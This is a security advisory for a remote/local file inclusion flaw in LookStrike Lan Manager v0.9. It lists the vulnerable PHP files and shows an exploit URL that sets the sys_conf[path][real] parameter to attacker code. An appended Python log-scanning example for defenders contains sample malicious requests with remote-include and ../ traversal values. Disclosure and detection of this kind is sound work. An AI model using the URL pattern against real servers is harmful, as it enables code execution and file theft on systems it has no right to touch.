--==+================================================================================+==--
--==+ LookStrike Lan Manager v0.9 Remote/Local File Inclusion +==--
--==+================================================================================+==--
Author: MhZ91
Title: LookStrike Lan Manager v0.9 Remote/Local File Inclusion
Download: http://sourceforge.net/project/showfiles.php?group_id=152660
Bug: Remote/Local File Inclusion
Info: LookStrike is a tool written in PHP that manages LAN parties and saves you a lot of time in managing your LAN. You can also gather statistics on your players. LookStrike generates graphics and matches for tournaments automatically.
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
LookStrike Lan Manager v0.9 has a remote/local file inclusion vulnerability in the following files:
modules/class/Table.php
modules/class/db/db_admins.php
modules/class/db/db_alert.php
modules/class/db/db_double.php
modules/class/db/db_games.php
modules/class/db/db_matches.php
modules/class/db/db_match_teams.php
modules/class/db/db_news.php
modules/class/db/db_platform.php
modules/class/db/db_players.php
modules/class/db/db_server_group.php
modules/class/db/db_server_ip.php
modules/class/db/db_teams.php
modules/class/db/db_team_players.php
modules/class/db/db_tournaments.php
modules/class/db/db_tournament_teams.php
modules/class/db/db_trees.php
modules/class/tournament/Match.php
modules/class/tournament/MatchTeam.php
modules/class/tournament/Rule.php
modules/class/tournament/RuleBuilder.php
modules/class/tournament/RulePool.php
modules/class/tournament/RuleSingle.php
modules/class/tournament/RuleTree.php
modules/class/tournament/Tournament.php
modules/class/tournament/TournamentTeam.php
modules/class/tournament/Tree.php
modules/class/tournament/TreeSingle.php
All of them are exploitable through the variable "sys_conf[path][real]", for example:
http://www.example.com/modules/class/Table.php?sys_conf[path][real]=[Evil_Code]
[*]----------------------------------------------------------
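Added example (not part of the original advisory, and not LookStrike code): a log check for defenders that flags requests setting sys_conf[path][real] on files under modules/class/, including percent-encoded forms of the parameter name. The log lines are constructed samples in combined log format, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "sys_conf[path][real]"   # parameter named in the advisory
# Class files live under modules/class/ (from the advisory's example URL).
PATH_RE = re.compile(r"/modules/class/[\w/]*\.php$", re.IGNORECASE)
# Request field of a combined-format access log line.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, invented values).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2008:10:00:03 +0000] "GET /modules/class/Table.php'
    '?sys_conf[path][real]=http://host.invalid/a.txt HTTP/1.1" 200 312',
    '203.0.113.5 - - [01/Jan/2008:10:00:07 +0000] "GET /lan/modules/class/db/db_news.php'
    '?sys_conf%5Bpath%5D%5Breal%5D=..%2F..%2Fsome%2Ffile HTTP/1.0" 200 98',
    '192.0.2.44 - - [01/Jan/2008:10:01:00 +0000] "GET /modules/class/Table.php HTTP/1.1" 200 0',
]

def classify(value):
    """Label the supplied value: remote URL, local path, or other."""
    v = unquote(value).lower()          # one extra decode for double encoding
    if re.match(r"^[a-z][a-z0-9+.-]*://", v):
        return "remote"
    if "../" in v or "..\\" in v or v.startswith("/"):
        return "local"
    return "other"

def scan(lines):
    """Return (line_no, path, kind) for each request that sets PARAM on a class file."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not PATH_RE.search(unquote(target.path)):
            continue
        # parse_qsl percent-decodes names, so sys_conf%5Bpath%5D%5Breal%5D matches.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == PARAM:            # PHP variable names are case-sensitive
                hits.append((n, target.path, classify(value)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the query string, so a value sent in a POST body will not appear here.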
# sebug.net